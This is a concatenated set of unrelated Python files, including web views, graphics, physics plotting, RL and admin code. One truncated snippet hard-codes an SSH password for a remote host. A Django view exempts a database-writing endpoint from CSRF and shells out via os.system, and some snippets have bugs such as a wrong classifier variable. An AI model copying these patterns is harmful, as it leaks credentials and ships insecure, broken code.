blueprint.add_url_rule('/sso/init', 'saml_idp_init', views.SSOInitView.as_view('saml_idp_init'))
blueprint.add_url_rule('/login/process/', 'saml_login_process', views.LoginProcessView.as_view('saml_login_process'))
blueprint.add_url_rule('/login/process_multi_factor/', 'saml_multi_factor',
                       views.ProcessMultiFactorView.as_view('saml_multi_factor'), methods=['GET'])
# Public IdP metadata document.
blueprint.add_url_rule('/metadata/', 'saml2_idp_metadata', views.metadata)
@blueprint.after_request
def disable_cache(response):
    """Stamp *response* with headers that forbid any client or proxy caching.

    Registered as an after-request hook so every response from this
    blueprint is marked uncacheable.  Returns the same response object.
    """
    no_cache_headers = {
        'Cache-Control': 'max-age=0, no-cache, no-store, must-revalidate, private',
        'Pragma': 'no-cache',
        'Expires': '0',
    }
    for header, value in no_cache_headers.items():
        response.headers[header] = value
    return response
|
11,065 | d1cd4afe3822417cb873854e356ab3626f22c182 | import builtins
from django.shortcuts import render, render_to_response
from django.http import HttpResponse, HttpResponseRedirect
import os
# Wrap CSRF-exempt requests so Django does not reject them as cross-site attacks.
from django.views.decorators.csrf import csrf_exempt
from .models import Program,person,log_report
# Save a Program record posted by a client.
@csrf_exempt
def add(request):
    # c={}
    id = request.POST['id']
    URL = request.POST['URL']
    StatsCode = request.POST['StatsCode']
    Response = request.POST['Response']
    st = Program()
    if len(id) > 0:
        print("id不是null")
        st.id = id
    st.StatsCode = StatsCode
    st.URL = URL
    st.Response = Response
    st.save()
    # Redirect to the listing view after saving.
    return HttpResponseRedirect("/q")
# Query all Program records and render them.
def query(request):
    b = Program.objects.all()
    return render_to_response('curd.html', {'data': b})
# Show a single Program record for editing.
def showUid(request):
    id = request.GET['id'];
    bb = Program.objects.get(id=id)
    return render_to_response('update.html', {'data': bb})
# Delete data — the delete logic is commented out; this now re-runs an
# external script instead.
def delByID(request):
    # id = request.GET['id'];
    # bb = Program.objects.get(id=id)
    # bb.delete()
    # NOTE(review): shelling out to a hard-coded Windows path is fragile and,
    # if the path ever becomes user-controlled, a command-injection risk.
    os.system("python D:\\website\website\\ScriptT\\SQLine.py")
    return HttpResponseRedirect("/Performance/HomePage")
# Display interface-documentation data.
def InterFace(request):
    b = person.objects.all()
    return render_to_response('InterFace.html', {'data': b})
# Display error-code data (renders log_report entries).
def ErrorCode(request):
    b = log_report.objects.all()
    return render_to_response('ErrorCode.html', {'data': b})
# Redirect to the performance-report page.
def perfor(request):
    return render_to_response('index.html')
# Automated test-case home page.
def CaseHome(request):
    b = log_report.objects.all()
    return render_to_response('ErrorCode.html', {'data': b})
# Add an automated test case (stub).
def addCase(request):
    print("+++")
# Delete an automated test case (stub).
def DeletCase(request):
    print("----")
# Successful test cases
# Failed test cases
11,066 | 48ae4709bcbabe8098d6a002556de91aba068429 | # test viper with multiple subscripts in a single expression
# NOTE: these functions use MicroPython's @micropython.viper decorator and the
# ptr8 typed-pointer annotation; this file runs only under MicroPython.
@micropython.viper
def f1(b: ptr8):
    # Two subscripts in one augmented-assignment statement.
    b[0] += b[1]
b = bytearray(b"\x01\x02")
f1(b)
print(b)  # first byte becomes 0x03
@micropython.viper
def f2(b: ptr8, i: int):
    # Subscript with a variable index on the right-hand side.
    b[0] += b[i]
b = bytearray(b"\x01\x02")
f2(b, 1)
print(b)  # first byte becomes 0x03
@micropython.viper
def f3(b: ptr8) -> int:
    # Assemble a 32-bit big-endian integer from four bytes.
    return b[0] << 24 | b[1] << 16 | b[2] << 8 | b[3]
print(hex(f3(b"\x01\x02\x03\x04")))  # 0x1020304
|
11,067 | b3a5b04ff31fba2df233f4475de351ac4193288e | # Learn Python the Hard Way Exercise 19 SD3
# NOTE: Python 2 script (print statements, raw_input).
def my_function(arg1, arg2):
    # Print both arguments, then their sum/concatenation (whatever + means
    # for the argument types).
    print "summing arg1: %r and arg2: %r..." % (arg1, arg2)
    print arg1 + arg2
print "1. Call function by inserting numbers:"
my_function(4, 44)
print "2. Call funtion by inserting strings:"
my_function('cat', 'dog')
print "3. Call funtion with integer variables"
x = 400
y = 440
my_function(x, y)
print "4. Call funtion with string variables"
a, b = 'snake', 'mouse'
my_function(a, b)
print "5. Values from other functions, here is randint:"
import random
my_function(random.randint(1,100), random.randint(1,100))
print "6. Values from raw input:"
d = raw_input("Please enter a value to be summed:")
my_function(d, d)
print "7. Values from math in function"
my_function(4 + 6, 5 + 5)
print "8. Raw input plus math"
e = raw_input("Enter a value: ")
# raw_input returns a string, so e + e is string concatenation, not math.
my_function(e, e + e)
print "9. Raw input directly in the function call"
my_function(raw_input("Enter first number: "), raw_input("enter second number: "))
print "10. How about a string and an integer"
my_function(str(4), 'dogs')
|
11,068 | 3966bc4e51d00725278c86fe98b9b3e248d5ac74 | # Wood, Jeff
# 100-103-5461
# 2016-05-02
# Assignment_05
# From
# http:
import sys
import OpenGL
from OpenGL.GL import *
from OpenGL.GLU import *
from OpenGL.GLUT import *
# Rotation state shared by display() and keyHandler().
Angle = 0
Incr = 1
def create_pyramid():
    """Compile display list 1: a square-based pyramid with colored faces."""
    glNewList(1,GL_COMPILE)
    glBegin(GL_TRIANGLES)
    # Base: two triangles in the z=0 plane (drawn with the current color).
    glVertex3f(0,0,0)
    glVertex3f(1,1,0)
    glVertex3f(0,1,0)
    glVertex3f(0,0,0)
    glVertex3f(1,0,0)
    glVertex3f(1,1,0)
    # Four side faces, each in its own color, meeting at the apex (0.5,0.5,1).
    glColor3f(0,1,0)
    glVertex3f(0,0,0)
    glVertex3f(0,1,0)
    glVertex3f(0.5,0.5,1)
    glColor3f(0,0,1)
    glVertex3f(0,1,0)
    glVertex3f(1,1,0)
    glVertex3f(0.5,0.5,1)
    glColor3f(1,1,0)
    glVertex3f(1,1,0)
    glVertex3f(1,0,0)
    glVertex3f(0.5,0.5,1)
    glColor3f(1,0,1)
    glVertex3f(1,0,0)
    glVertex3f(0,0,0)
    glVertex3f(0.5,0.5,1)
    glEnd()
    glEndList()
def create_3d_axes():
    """Compile display list 2: RGB axis lines along +x, +y, +z."""
    glNewList(2,GL_COMPILE)
    glBegin(GL_LINES)
    glColor3f(1,0,0)
    glVertex3f(0,0,0)
    glVertex3f(2,0,0)
    glEnd()
    glBegin(GL_LINES)
    glColor3f(0,1,0)
    glVertex3f(0,0,0)
    glVertex3f(0,2,0)
    glEnd()
    glBegin(GL_LINES)
    glColor3f(0,0,1)
    glVertex3f(0,0,0)
    glVertex3f(0,0,2)
    glEnd()
    glEndList()
def display():
    """Render the spinning pyramid into four scissored viewports.

    Each quadrant uses a different camera/projection (two frustums, one
    perspective, one orthographic); display list 1 is the pyramid and
    list 2 the fixed axes.  Finally the model-view matrix is advanced by
    Incr degrees for the next frame.
    """
    global Angle
    global Incr
    w=glutGet(GLUT_WINDOW_WIDTH)
    h=glutGet(GLUT_WINDOW_HEIGHT)
    ## Upper-Left: frustum, camera on +z looking at the origin.
    glEnable(GL_SCISSOR_TEST)
    glScissor(int(0.05*w),int(0.55*h),int(0.4*w),int(0.4*h))
    glClearColor(0.4,0.4,0.6,0)
    glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
    glMatrixMode(GL_PROJECTION)
    glLoadIdentity()
    glFrustum(-1,1,-1,1,1,30)
    gluLookAt(0,0,3,0,0,0,0,1,0)
    glMatrixMode(GL_MODELVIEW)
    glViewport(int(0.05*w),int(0.55*h),int(0.4*w),int(0.4*h))
    glCallList(1)
    # Draw the axes without the rotation applied to the pyramid.
    glPushMatrix()
    glLoadIdentity()
    glCallList(2)
    glPopMatrix()
    ## Lower-Left: frustum, camera on +y (top-down view).
    glEnable(GL_SCISSOR_TEST)
    glScissor(int(0.05*w),int(0.05*h),int(0.4*w),int(0.4*h))
    glClearColor(0.4,0.4,0.6,0)
    glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
    glMatrixMode(GL_PROJECTION)
    glLoadIdentity()
    glFrustum(-1,1,-1,1,1,30)
    gluLookAt(0,3,0,0,0,0,0,0,1)
    glMatrixMode(GL_MODELVIEW)
    glViewport(int(0.05*w),int(0.05*h),int(0.4*w),int(0.4*h))
    glCallList(1)
    glPushMatrix()
    glLoadIdentity()
    glCallList(2)
    glPopMatrix()
    ## Upper-Right: gluPerspective, camera on +x.
    glScissor(int(0.55*w),int(0.55*h),int(0.4*w),int(0.4*h))
    glClearColor(0.4,0.4,0.6,0)
    glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
    glMatrixMode(GL_PROJECTION)
    glLoadIdentity()
    #glFrustum(-1,1,-1,1,1,30)
    gluPerspective(45,.5,1,30)
    gluLookAt(3,0,0,0,0,0,0,1,0)
    glMatrixMode(GL_MODELVIEW)
    glViewport(int(0.55*w),int(0.55*h),int(0.4*w),int(0.4*h))
    glCallList(1)
    glPushMatrix()
    glLoadIdentity()
    glCallList(2)
    glPopMatrix()
    ## Lower-Right: orthographic projection, diagonal camera.
    glScissor(int(0.55*w),int(0.05*h),int(0.4*w),int(0.4*h))
    glClearColor(0.4,0.4,0.6,0)
    glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
    glMatrixMode(GL_PROJECTION)
    glLoadIdentity()
    glOrtho(-1,1,-1,1,1,30)
    #glFrustum(-1,1,-1,1,1,30)
    gluLookAt(2,2,2,0,0,0,0,1,0)
    glMatrixMode(GL_MODELVIEW)
    glViewport(int(0.55*w),int(0.05*h),int(0.4*w),int(0.4*h))
    glCallList(1)
    glPushMatrix()
    glLoadIdentity()
    glCallList(2)
    glPopMatrix()
    glFlush()
    glutSwapBuffers()
    # Advance the model-view rotation about the y axis for the next frame.
    glLoadIdentity()
    glRotated(Angle,0,1,0)
    Angle = Angle + Incr
def keyHandler(Key, MouseX, MouseY):
    """GLUT keyboard callback.

    F/f speeds the rotation up, S/s slows it down (announcing "Stopped"
    once the increment reaches 0), Q/q quits.  GLUT delivers Key as a
    bytes object; the mouse coordinates are unused.
    """
    global Incr
    if Key == b'f' or Key == b'F':
        # Fixed: the message was a bytes literal, so it printed as
        # b'Speeding Up' instead of plain text.
        print ("Speeding Up")
        Incr = Incr + 1
    elif Key == b's' or Key == b'S':
        if Incr == 0:
            print ("Stopped")
        else:
            print ("Slowing Down")
            Incr = Incr - 1
    elif Key == b'q' or Key == b'Q':
        print ("Bye")
        sys.exit()
    else:
        print ("Invalid Key ",Key)
def timer(dummy):
    # Redraw and re-arm the timer every 30 ms for continuous animation.
    display()
    glutTimerFunc(30,timer,0)
def reshape(w, h):
    # Window resize callback: just report the new size.
    print ("Width=",w,"Height=",h)
def init():
    """Create the GLUT window and set the global GL state."""
    glutInit(sys.argv)
    glutInitDisplayMode(GLUT_DOUBLE|GLUT_RGB|GLUT_DEPTH)
    glutInitWindowSize(800, 500)
    glutInitWindowPosition(100, 100)
    glutCreateWindow(b"PyOpenGL Demo")
    glClearColor(1,1,0,0)
    glPolygonMode(GL_FRONT_AND_BACK,GL_FILL)
    # Depth testing so nearer faces hide farther ones.
    glEnable(GL_DEPTH_TEST)
    glDepthFunc(GL_LESS);
def callbacks():
    """Register display, keyboard, timer and reshape callbacks."""
    glutDisplayFunc(display)
    glutKeyboardFunc(keyHandler)
    glutTimerFunc(300,timer,0)
    glutReshapeFunc(reshape)
def draw():
    """Reset the matrices and compile the two display lists."""
    glMatrixMode(GL_PROJECTION)
    glLoadIdentity()
    glMatrixMode(GL_MODELVIEW)
    create_pyramid()
    create_3d_axes()
def main():
    init()
    callbacks()
    draw()
    glutMainLoop()
main()
|
11,069 | 9375c1ac6a32a1ac882ffc34575d8a915bbbe766 | import ROOT
import sys
sys.path.insert(0, '/afs/cern.ch/work/k/kpachal/PythonModules/art/')
import AtlasStyle
AtlasStyle.SetAtlasStyle()
ROOT.gROOT.ForceStyle()
# Want to compare 3 things:
# - points in the nose where there is disagreement:
#   - mMed = 750 & 800, mDM = 1.0, A-V plot couplints
# with points from the paper couplings which match this plot:
# https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CombinedSummaryPlots/EXOTICS/ATLAS_DarkMatterCoupling_Summary/ATLAS_DarkMatterCoupling_Summary.pdf
# where we have 10% width and 7% width
# Analysis couplings available: up to 0.4
# Input histogram files: narrow (g=0.05) and broad (g=0.40) coupling samples,
# plus the mass-mass signal samples keyed by DSID.
infile_narrow = "/afs/cern.ch/work/k/kpachal/TLA2017/CleanLimitCode/inputs/dataLikeHists_yStar06/dataLikeHistograms.m{0}_g0.05.root"
infile_broad = "/afs/cern.ch/work/k/kpachal/TLA2017/CleanLimitCode/inputs/dataLikeHists_yStar06/dataLikeHistograms.m{0}_g0.40.root"
infile_target = "/afs/cern.ch/work/k/kpachal/TLA2017/CleanLimitCode/inputs/signalsForMassMass/DijetTLA_13TeV2018_Full20152016_A2_y06_dataLikeHists_v1/dataLikeHistograms.{0}.root"
# this correlates the two points on the x axis which we want to check
# to DSIDs
DSIDtoMass = {
    310055 : {"mMed" : 750.0},
    310065 : {"mMed" : 800.0}
}
# Check both masses
for mass in ["0.75","0.8"] :
    # Get all 3 hists
    open_narrow = ROOT.TFile.Open(infile_narrow.format(mass))
    hist_narrow = open_narrow.Get("mjj_Scaled_m{0}_g0.05_1fb_Nominal".format(mass))
    # Detach the histogram from the file so it survives Close().
    hist_narrow.SetDirectory(0)
    open_narrow.Close()
    open_broad = ROOT.TFile.Open(infile_broad.format(mass))
    hist_broad = open_broad.Get("mjj_Scaled_m{0}_g0.40_1fb_Nominal".format(mass))
    hist_broad.SetDirectory(0)
    open_broad.Close()
    # NOTE(review): eval() on a literal from our own list is safe here, but
    # float(mass) would express the intent more directly.
    mass_number = eval(mass)*1000.
    # Find the DSID whose mediator mass matches this point (within 1%).
    for DSID in DSIDtoMass.keys() :
        if (DSIDtoMass[DSID]["mMed"] - mass_number)/mass_number < 0.01 :
            break
    open_target = ROOT.TFile.Open(infile_target.format(DSID))
    hist_target = open_target.Get("Nominal/mjj_Scaled_{0}_1fb".format(DSID))
    hist_target.SetDirectory(0)
    open_target.Close()
    # Want to plot the three on top of each other
    # Normalise for convenience of comparing
    hist_narrow.Scale(1.0/hist_narrow.Integral())
    hist_broad.Scale(1.0/hist_broad.Integral())
    hist_target.Scale(1.0/hist_target.Integral())
    c = ROOT.TCanvas("c_{0}".format(mass),'',0,0,800,600)
    hist_narrow.SetLineColor(ROOT.kGreen+2)
    hist_narrow.SetLineWidth(2)
    hist_narrow.GetXaxis().SetTitle("Mass [GeV]")
    hist_narrow.GetYaxis().SetTitle("A.U.")
    hist_narrow.GetXaxis().SetRangeUser(mass_number*(0.5),mass_number*(1.4))
    hist_target.SetLineColor(ROOT.kMagenta+1)
    hist_target.SetLineWidth(2)
    hist_broad.SetLineColor(ROOT.kBlue)
    hist_broad.SetLineWidth(2)
    hist_narrow.Draw("HIST")
    hist_broad.Draw("HIST SAME")
    hist_target.Draw("HIST SAME")
    c.Update()
    c.SaveAs("plots/width_comparison_{0}.eps".format(mass))
    # Now: we want a version that fits the signal we're interested in.
    # Parameters: mean, sigma
    # Constrain to range where peak is
    mygaussian = ROOT.TF1("gaus","gaus",0.9*mass_number,1.1*mass_number)
    # "R0S": restrict to the TF1 range, do not draw, return the fit result.
    result = hist_target.Fit(mygaussian,"R0S")
    # Retrieve values
    parameters = result.Parameters()
    # mean = mygaussian.GetParameter(0)
    # width = mygaussian.GetParameter(1)
    norm = parameters[0]
    mean = parameters[1]
    width = parameters[2]
    print "Fit parameters are",parameters
    print "I think these are normalisation, mean, and width according to Caterina's code"
    print "This is equivalent to a fractional width of width/mean_mass =",width/mean
    # Plot
    c = ROOT.TCanvas("c_{0}_fit".format(mass),'',0,0,800,600)
    hist_target.SetLineColor(ROOT.kBlack)
    hist_target.GetXaxis().SetTitle("Mass [GeV]")
    hist_target.GetYaxis().SetTitle("A.U.")
    hist_target.GetXaxis().SetRangeUser(mass_number*(0.5),mass_number*(1.4))
    hist_target.Draw()
    mygaussian.Draw("SAME")
    # Fit results
    newtext = ROOT.TLatex()
    newtext.SetNDC()
    newtext.SetTextSize(0.04)
    newtext.SetTextFont(42)
    newtext.SetTextAlign(11)
    newtext.DrawLatex(0.2,0.85,"Mean mass: {0:.2f} GeV".format(mean))
    newtext.DrawLatex(0.2,0.8,"1#sigma width: {0:.2f} GeV".format(width))
    newtext.DrawLatex(0.2,0.75,"Relative width: {0:.3f}".format(width/mean))
    c.Update()
    c.SaveAs("plots/width_fit_{0}.eps".format(mass))
|
11,070 | 0db7579e62ad435bdfa5c2a9709e37558b6e30e8 | /bin/bash
import watchdog
import paramiko, base64
import os
# NOTE(review): this snippet is truncated/broken — the final `if` is
# incomplete, the RSAKey data is not valid base64, and the SSH password is
# hard-coded in plain text (a serious credential leak). Do not ship as-is.
key = paramiko.RSAKey(data=base64.decodestring('D6YV3EVlAiWZB&nm'))
client = paramiko.SSHClient()
client.get_host_keys().add('dragoncave8.ddns.net', 'ssh-rsa', key)
client.connect('dragoncave8.ddns.net',username='stpaddock', password='D6YV3EVlAiWZB&nm')
stdin, stdout, stderr = client.exec_command('ls')
for line in stdout:
    if line == os.
|
11,071 | ba67c7147c6a390fefa81291df9a6fdb13d0655d | import json
import drugs.utils as utils
from django.conf import settings
from suds.client import Client
# get soap wsdl endpoint from settings (use WS Authentication)
# Module-level suds client shared by every wrapper function below.
client = Client(settings.DJANGOPHARMA_SOAP_URL,
                headers={'username': settings.WS_USERNAME,
                         'password': settings.WS_PASSWORD})
# Success response code returned by the web service.
_SUCCESS_CODE = 'C'


def _succeeded(response):
    # The WS marks a successful call with ResponseCode == 'C'.
    return response.ResponseCode == _SUCCESS_CODE


def _single_drug(response):
    # The WS returns a list of drugs; for single-drug calls it always
    # contains exactly one element.
    json_data = utils.xml2json(response)
    return json.loads(json_data)['drug'][0]


def _drug_payload(drug):
    # Request fields shared by addDrug and updateDrug.
    return {'id': drug.id, 'friendlyName': drug.friendly_name,
            'availability': drug.availability,
            'description': drug.description,
            'price': str(drug.price),
            'categoryId': drug.category.id}


def _category_payload(category):
    # Request fields shared by addDrugCategory and updateDrugCategory.
    return {'id': category.id, 'name': category.name,
            'description': category.description}


# get all drugs
def get_all_drugs():
    """Fetch every drug; return the converted JSON string, or None on WS failure."""
    response = client.service.fetchAllDrugs()
    if not _succeeded(response):
        return None
    # convert the xml to json
    return utils.xml2json(response)


# get drug categories
def get_drug_categories():
    """Fetch all drug categories as a list of dicts, or None on WS failure."""
    response = client.service.getDrugCategories()
    if not _succeeded(response):
        return None
    json_data = utils.xml2json(response)
    return json.loads(json_data)['drugCategory']


# get drug
def get_drug(drug_id):
    """Fetch one drug by id as a dict, or None on WS failure."""
    response = client.service.findDrug(drug_id)
    if not _succeeded(response):
        return None
    return _single_drug(response)


# add drug
def insert_drug(drug):
    """Create *drug* remotely; return the created drug dict, or None on failure."""
    request_data = _drug_payload(drug)
    # imagePath is only sent on creation (matches the original behaviour).
    request_data['imagePath'] = drug.imagePath
    response = client.service.addDrug(request_data)
    if not _succeeded(response):
        return None
    return _single_drug(response)


# update drug
def update_drug(drug):
    """Update *drug* remotely; return the updated drug dict, or None on failure."""
    response = client.service.updateDrug(_drug_payload(drug))
    if not _succeeded(response):
        return None
    return _single_drug(response)


# insert drug category
def insert_drug_category(category):
    """Create *category* remotely; return True on success, False otherwise."""
    response = client.service.addDrugCategory(_category_payload(category))
    # the response does not contain the drug category
    return _succeeded(response)


# update drug category
def update_drug_category(category):
    """Update *category* remotely; return True on success, False otherwise."""
    response = client.service.updateDrugCategory(_category_payload(category))
    # the response does not contain the drug category
    return _succeeded(response)
|
11,072 | 3d843f3fc6cc71d37379a93cee774ef06883594c | # Getter mehtods allow reading a properties values
# Setters allow modifying a property's value
class User:
    """Minimal user record exposing its username through accessor methods."""

    def __init__(self, username=None):
        # Name-mangled attribute backing the accessors below.
        self.__username = username

    def setUsername(self, x):
        """Replace the stored username with *x*."""
        self.__username = x

    def getUsername(self):
        """Return the stored username (None if it was never set)."""
        return self.__username
# Demo: exercise the getter/setter pair; expected output shown below.
Steve = User('steve1')
print('Before setting:', Steve.getUsername())
Steve.setUsername('steve2')
print('After setting:', Steve.getUsername())
# Before setting: steve1
# After setting: steve2
11,073 | fc256aaeec5a40b1c959025facff21838c0e6fb1 | from hathor.graphviz import GraphvizVisualizer
from tests import unittest
from tests.simulation.base import SimulatorTestCase
from tests.utils import gen_custom_tx
class BaseConsensusSimulatorTestCase(SimulatorTestCase):
    """Simulator-based consensus tests around conflicting transactions."""

    def create_chain(self, manager, first_parent_block_hash, length, prefix, tx_parents=None):
        """Mine and propagate `length` consecutive blocks on top of the given parent.

        Each block is labeled '<prefix>b<i>' in the graphviz output; if
        tx_parents is given it overrides the block's tx parents.  Returns
        the list of blocks in order.
        """
        current = first_parent_block_hash
        v = []
        for i in range(length):
            blk = manager.generate_mining_block(parent_block_hash=current)
            # Cap the weight so the chain stays comparable between runs.
            blk.weight = min(50.0, blk.weight)
            blk.nonce = self.rng.getrandbits(32)
            if tx_parents:
                blk.parents[1:] = tx_parents
            blk.update_hash()
            self.graphviz.labels[blk.hash] = f'{prefix}b{i}'
            self.assertTrue(manager.propagate_tx(blk))
            # Let the simulator advance between blocks.
            self.simulator.run(10)
            v.append(blk)
            current = blk.hash
        return v
    def test_conflict_with_parent_tx(self):
        """A tx conflicting with its own parent must stay voided after reorgs."""
        manager1 = self.create_peer()
        manager1.allow_mining_without_peers()
        self.graphviz = GraphvizVisualizer(manager1.tx_storage, include_verifications=True, include_funds=True)
        # Genesis-adjacent block b1, then a 15-block chain A on top of it.
        b1 = manager1.generate_mining_block()
        b1.nonce = self.rng.getrandbits(32)
        b1.update_hash()
        self.graphviz.labels[b1.hash] = 'b1'
        self.assertTrue(manager1.propagate_tx(b1))
        self.simulator.run(10)
        A_list = self.create_chain(manager1, b1.hash, 15, 'A-')
        # tx1 spends the first A block's reward; tx2 spends tx1.
        tx1 = gen_custom_tx(manager1, [(A_list[0], 0)])
        tx1.parents = manager1.get_new_tx_parents(tx1.timestamp)
        tx1.update_hash()
        self.graphviz.labels[tx1.hash] = 'tx1'
        self.assertTrue(manager1.propagate_tx(tx1))
        tx2 = gen_custom_tx(manager1, [(tx1, 0)])
        tx2.parents = manager1.get_new_tx_parents(tx2.timestamp)
        tx2.update_hash()
        self.graphviz.labels[tx2.hash] = 'tx2'
        self.assertTrue(manager1.propagate_tx(tx2))
        # tx3-1 and tx3-2 both spend tx2's output — a double spend, with
        # tx3-2 additionally using conflicting tx3-1 as one of its parents.
        tx31 = gen_custom_tx(manager1, [(tx2, 0)])
        self.graphviz.labels[tx31.hash] = 'tx3-1'
        self.assertTrue(manager1.propagate_tx(tx31))
        tx32 = gen_custom_tx(manager1, [(tx2, 0)])
        tx32.parents = [tx31.hash, tx2.hash]
        tx32.timestamp = tx31.timestamp + 1
        tx32.update_hash()
        self.assertTrue(manager1.propagate_tx(tx32))
        self.assertIsNone(tx31.get_metadata().voided_by)
        self.assertEqual({tx32.hash}, tx32.get_metadata().voided_by)
        # A longer chain B reorgs A out; both txs inherit A's voidedness.
        self.create_chain(manager1, b1.hash, 20, 'B-', tx_parents=b1.parents[1:])
        self.assertEqual({A_list[0].hash, tx31.hash}, tx31.get_metadata().voided_by)
        self.assertEqual({A_list[0].hash, tx31.hash, tx32.hash}, tx32.get_metadata().voided_by)
        # Uncomment lines below to visualize the DAG and the blockchain.
        # dot = self.graphviz.dot()
        # dot.render('dot0')
class SyncV1ConsensusSimulatorTestCase(unittest.SyncV1Params, BaseConsensusSimulatorTestCase):
    __test__ = True
class SyncV2ConsensusSimulatorTestCase(unittest.SyncV2Params, BaseConsensusSimulatorTestCase):
    __test__ = True
# sync-bridge should behave like sync-v2
class SyncBridgeConsensusSimulatorTestCase(unittest.SyncBridgeParams, SyncV2ConsensusSimulatorTestCase):
    __test__ = True
|
11,074 | 63596a9a0c242ead8c061cb17a7725a4bdc42dd0 | import lyricsgenius
# NOTE(review): `token` is not defined in this snippet — it must hold a Genius
# API access token obtained elsewhere; confirm it is set before this line runs.
genius = lyricsgenius.Genius(token)
11,075 | 9c64e955e344307960a69fc2d0335335b5698760 | import gym
import torch
import numpy as np
import torchvision.transforms as T
import matplotlib.pyplot as plt
from IPython import display as ipythondisplay
class CartPoleEnvManager():
    """Wraps gym's CartPole-v0 for pixel-based RL agents.

    Exposes the environment as preprocessed screen-difference tensors
    (cropped, resized, CHW, batch dim of 1) on the given torch device.
    """

    def __init__(self, device, env_wrapper=lambda x: x, timestep_limit = 100, xvfb_mode=False):
        # Torch device that all returned tensors are moved to.
        self.device = device
        # .unwrapped removes gym's built-in episode-length limit.
        env = gym.make('CartPole-v0').unwrapped
        #env = gym.make('CartPole-v0')
        env.spec.timestep_limit = timestep_limit
        #self.env = env_wrapper(env)
        self.env = env
        self.env.reset()
        # Last processed screen; None marks the start of an episode.
        self.current_screen = None
        self.done = False
        self.xvfb_mode = xvfb_mode
    def reset(self):
        # Restart the episode and forget the previous screen.
        self.env.reset()
        self.current_screen = None
    def close(self):
        self.env.close()
    def render(self, mode='human'):
        screen = self.env.render(mode)
        return screen
    def num_actions_available(self):
        # Size of the discrete action space.
        return self.env.action_space.n
    def take_action(self, action):
        #print('in take_action; done=', self.env.env.done)
        _, reward, self.done, _ = self.env.step(action.item())
        return torch.tensor([reward], device=self.device) # step() expects normal number, not torch tensor!
    def just_starting(self):
        return self.current_screen is None
    # The state is defined as the difference between the current screen and the previous screen
    def get_state(self):
        if self.just_starting() or self.done:
            # No meaningful previous frame: return an all-black state.
            self.current_screen = self.get_processed_screen()
            black_screen = torch.zeros_like(self.current_screen)
            return black_screen
        else:
            s1 = self.current_screen
            s2 = self.get_processed_screen()
            self.current_screen = s2
            return s2 - s1
    def get_screen_height(self):
        # Processed screens are (1, C, H, W); index 2 is the height.
        screen = self.get_processed_screen()
        return screen.shape[2]
    def get_screen_width(self):
        screen = self.get_processed_screen()
        return screen.shape[3]
    def get_processed_screen(self):
        # Render as an RGB array, crop to the cart region, then transform.
        screen = self.render('rgb_array')
        screen = self.crop_screen(screen, hwc=True)
        #if self.xvfb_mode:
        #    plt.imshow(screen)
        #ipythondisplay.clear_output(wait=True)
        #    ipythondisplay.display(plt.gcf())
        return self.transform_screen_data(screen.transpose((2, 0, 1))) # CHW is expected HWC -> CHW
    def crop_screen(self, screen, hwc=True):
        # Crop to the central 40%-80% vertical, 20%-80% horizontal band
        # where the cart and pole actually appear.
        screen_height = screen.shape[0] if hwc else screen.shape[1]
        screen_width = screen.shape[1] if hwc else screen.shape[0]
        # Strip off top bottom
        top = int(screen_height * 0.4)
        bottom = int(screen_height * 0.8)
        left = int(screen_width * 0.2)
        right = int(screen_width * 0.8)
        screen = screen[top:bottom, left:right, :] if hwc else screen[left:right, top:bottom, :]
        return screen
    def transform_screen_data(self, screen):
        # Convert to float, rescale, convert to tensor
        screen = np.ascontiguousarray(screen, dtype=np.float32) / 255
        screen = torch.from_numpy(screen)
        # use torchvision package to compose image transformations
        resize = T.Compose([
            T.ToPILImage()
            ,T.Resize((40,90))
            ,T.ToTensor()
        ])
        # Add a leading batch dimension and move to the configured device.
        return resize(screen).unsqueeze(0).to(self.device)
|
11,076 | 02c4131a1a645489929cf87048db43c3b074e938 | """KERNEL SVM"""
from sklearn.svm import SVC
classifier4 = SVC(kernel = 'rbf', random_state = 0)
classifier4.fit(X_train, y_train)
y_pred4 = classifier.predict(X_test)
print(np.concatenate((y_pred4.reshape(len(y_pred4),1), y_test.reshape(len(y_test),1)),1))
from sklearn.metrics import confusion_matrix, accuracy_score
cm4 = confusion_matrix(y_test, y_pred4)
print(cm4)
accuracy_score(y_test, y_pred4)
print("Training score:{:.3f}".format(classifier4.score(X_train, y_train)))
print("Test score:{:.3f}".format(classifier4.score(X_test, y_test)))
|
11,077 | 5106da050825a85069464e4267d9f3b48c49b628 | from django.contrib import admin
from models import Message,Notification,Detail,Location, Organization, Account, Profile, Action
# Models registered with the default admin options.
admin.site.register(Message)
admin.site.register(Notification)
admin.site.register(Detail)
class LocationAdmin(admin.ModelAdmin):
    """Admin for Location: editable address fields, listed by address."""
    fields = ['place', 'postalcode', 'address', 'county', 'country']
    list_display = ('address', 'place', 'postalcode', 'county', 'country')
admin.site.register(Location, LocationAdmin)
class OrganizationAdmin(admin.ModelAdmin):
    """Admin for Organization: grouped edit form, listed by name."""
    fieldsets = [
        ('Name', {'fields': ['name']}),
        ('Phone', {'fields': ['phone']}),
        ('Location', {'fields': ['location']}),
    ]
    list_display = ('name', 'location', 'phone')
admin.site.register(Organization, OrganizationAdmin)
class AccountAdmin(admin.ModelAdmin):
    """Admin for Account: role/profile/user plus the approval flag."""
    fields = ['role', 'profile', 'user','approved']
    list_display = ('role', 'profile')
admin.site.register(Account, AccountAdmin)
class ProfileAdmin(admin.ModelAdmin):
    """Admin for Profile: personal details, listed with creation date."""
    fields = [
        'firstname',
        'lastname',
        'IDNO',
        'sex',
        'birthday',
        'phone',
        'address',
    ]
    list_display = ('firstname', 'lastname', 'birthday', 'created')
admin.site.register(Profile, ProfileAdmin)
class ActionAdmin(admin.ModelAdmin):
    """Admin for the Action audit log: timestamp is read-only, newest first."""
    readonly_fields = ('timePerformed',)
    fields = [
        'type',
        'description',
        'account',
    ]
    list_display = ('account', 'type', 'description', 'timePerformed')
    list_filter = ('account', 'type', 'timePerformed')
    ordering = ('-timePerformed',)
admin.site.register(Action, ActionAdmin)
|
11,078 | a9f67dffdfba590ec804b97cc08f86bcfc6c0a27 | import base64
img_data = b"<base64 here>"
with open("imageToSave.jpg", "wb") as fh:
fh.write(base64.decodebytes(img_data))
|
11,079 | 47efe60073d3773351dfc014db15705407daedf0 | from enum import Enum
class ExitStatus(Enum):
